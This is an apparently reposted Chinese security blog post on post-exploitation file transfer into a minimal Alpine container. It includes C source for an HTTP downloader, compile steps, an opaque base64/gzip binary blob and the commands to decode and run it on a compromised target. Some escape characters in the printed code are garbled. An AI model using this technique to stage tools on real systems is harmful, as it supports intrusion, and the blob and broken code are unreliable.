本文以 alpine 镜像为例,alpine 作为最轻量的容器镜像,只有 5m 左右。所以导致很多常用的命令都没有,包括 curl 和 wget,并且容器中是没有 /dev/tcp 设备的,exec 的 trick 也没法使用。
场景分析
在攻防对抗中,我们通常会拿到容器的权限,可能是命令执行或者反弹 shell。但是容器中没有任何可以下载的工具,也无法通过 apk 去安装命令。
如何判断一个容器的源镜像
cat /etc/os-release
/etc/os-release 可判断容器所以使用镜像源
对抗思路
既然没办法在容器内安装下载的命令工具,我们可以手动写一个编译好的下载工具到容器中。
这里我用 C 实现了一个最简单的文件下载工具,只支持 http 协议。
#include <arpa/inet.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
if (argc != 2) {
fprintf(stderr, " C Downloader nn Usage: %s <url>n only support http protocol n", argv[0]);
return 1;
}
char *url = argv[1];
char *host_start = strstr(url, "http://");
if (host_start) {
host_start += 7;
} else {
host_start = url;
}
char *host = strtok(host_start, "/");
char *port_str = "80";
char *path = strtok(NULL, "");
char *colon = strchr(host, ':');
if (colon) {
*colon = '�';
port_str = colon + 1;
}
int sockfd;
struct addrinfo hints, *servinfo, *p;
int rv;
char request[256];
char buffer[1024];
int file;
memset(&hints, 0, sizeof hints);
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if ((rv = getaddrinfo(host, port_str, &hints, &servinfo)) != 0) {
fprintf(stderr, "getaddrinfo: %sn", gai_strerror(rv));
return 1;
}
for (p = servinfo; p != NULL; p = p->ai_next) {
if ((sockfd = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
perror("socket");
continue;
}
if (connect(sockfd, p->ai_addr, p->ai_addrlen) == -1) {
close(sockfd);
perror("connect");
continue;
}
break;
}
if (p == NULL) {
fprintf(stderr, "failed to connectn");
return 2;
}
freeaddrinfo(servinfo);
snprintf(request, sizeof(request), "GET /%s HTTP/1.1rnHost: %s:%srnConnection: closernrn", path, host, port_str);
send(sockfd, request, strlen(request), 0);
file = open("downloaded_file", O_WRONLY | O_CREAT | O_TRUNC, 0644);
int received;
int header_end = 0;
while ((received = recv(sockfd, buffer, sizeof(buffer), 0)) > 0) {
if (!header_end) {
char *header_end_ptr = strstr(buffer, "rnrn");
if (header_end_ptr) {
header_end = 1;
write(file, header_end_ptr + 4, received - (header_end_ptr - buffer) - 4);
}
} else {
write(file, buffer, received);
}
}
close(file);
close(sockfd);
return 0;
}编译下载工具的坑
我们需要编译上面这段 C 的代码,这里要注意宿主机和 alpine 容器中的动态链接库是不同的。
这里我们用 gcc 编译同样的 C 代码。
gcc -Os -s -fdata-sections -ffunction-sections -flto -Wl,--gc-sections -o downloader downloader.c
所以在宿主机上编译的程序是没办法在容器中运行的,需要在容器中重新编译!
因为 Alpine Linux 使用 musl libc 作为默认的 C 库,所以在 Alpine 环境中编译的程序将自动链接到 musl libc
要在 Alpine Linux 上编译一个依赖于 musl libc 库的二进制文件,需要使用一个 Alpine Linux 环境,并确保已安装必要的编译工具。
编译过程
docker run --name apline -dit alpine
// 进入容器中
docker exec -it apline sh
// 安装gcc
apk add --no-cache build-base
// 编译工具代码
gcc -Os -s -fdata-sections -ffunction-sections -flto -Wl,--gc-sections -o downloader downloader.cgzip压缩shellcode
编译好的二进制文件通常有十几 kb,虽然算不上大但还是会影响我们传输。可以通过 gzip 将体积压缩到最小。
gzip 压缩后已经到了可接受的长度。这里我把压缩后的 shellcode 放在下面。
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在目标容器上还原二进制文件
/ # cat output | base64 -d >new.gz
/ # gzip -d new.gz
/ # chmod +x new
/ # ./new
C Downloader
Usage: ./new <url>
only support http protocol
补充
部分 alpine 镜像其实是带有 busybox 的,如果有就没有必要那么麻烦直接用 busybox 种的 curl 或 wget 进行下载即可。
本文作者:Zgao原文地址:https://zgao.top/%e6%9e%81%e7%ab%af%e5%ae%b9%e5%99%a8%e5%9c%ba%e6%99%af%e4%b8%8b%e7%9a%84%e8%bf%9c%e7%a8%8b%e6%96%87%e4%bb%b6%e4%b8%8b%e8%bd%bd%e6%80%9d%e8%b7%af/
文章来源:刨洞安全团队
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
END
原文始发于微信公众号(黑白之道):极端容器场景下的远程文件下载思路
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论